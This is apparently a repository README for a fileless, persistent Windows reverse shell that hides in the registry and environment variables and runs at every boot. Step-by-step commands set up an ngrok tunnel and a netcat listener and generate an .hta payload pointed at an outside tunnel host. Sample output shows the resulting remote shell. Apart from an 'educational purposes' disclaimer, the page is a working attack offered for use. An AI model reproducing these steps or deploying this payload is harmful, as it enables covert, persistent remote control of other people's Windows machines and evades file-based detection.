LOTL
Living Off The Land (LOTL) persistent Reverse shell
Install / Use
/learn @Null-byte-00/LOTLREADME
Living off the land (LOTL) persistent reverse shell for windows
This is a fileless living off the land reverse shell written in JScript and Powershell script. It runs every time the windows boots and relies solely on windows registry and environment variables to execute without creating any files on the system<br> Disclaimer: this program is only for educational purposes
Proof of concept
WARNING: Since editing windows registries can cause some problems, I really recommend running this program on a virtual machine<br>
download the repository and run POC.hta file on your windows system<br>
Now every time you reboot your windows a messagebox with 'living off the land' message will appear

Reverse shell
In this case I'm using ngrok to make a tcp tunnel:
ngrok tcp 3333
then we run netcat to listen on port 3333
nc -nvlp 3333
creating payload
Now we can create out payload with our ngrok tunnel's domain and port
python.exe generator.py 8.tcp.ngrok.io 18053 payload.hta
all you have to do now is to run payload.hta in your windows machine and you get a reverse shell
┌─[parrot@parrot]─[~]
└──╼ $nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 50662
> echo hello
hello
>
this reverse shell is persistent meaning every time you boot the windows the payload will execute
Related Skills
node-connect
329.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
openai-image-gen
329.7kBatch-generate images via OpenAI Images API. Random prompt sampler + `index.html` gallery.
claude-opus-4-5-migration
81.2kMigrate prompts and code from Claude Sonnet 4.0, Sonnet 4.5, or Opus 4.1 to Opus 4.5
frontend-design
81.2kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
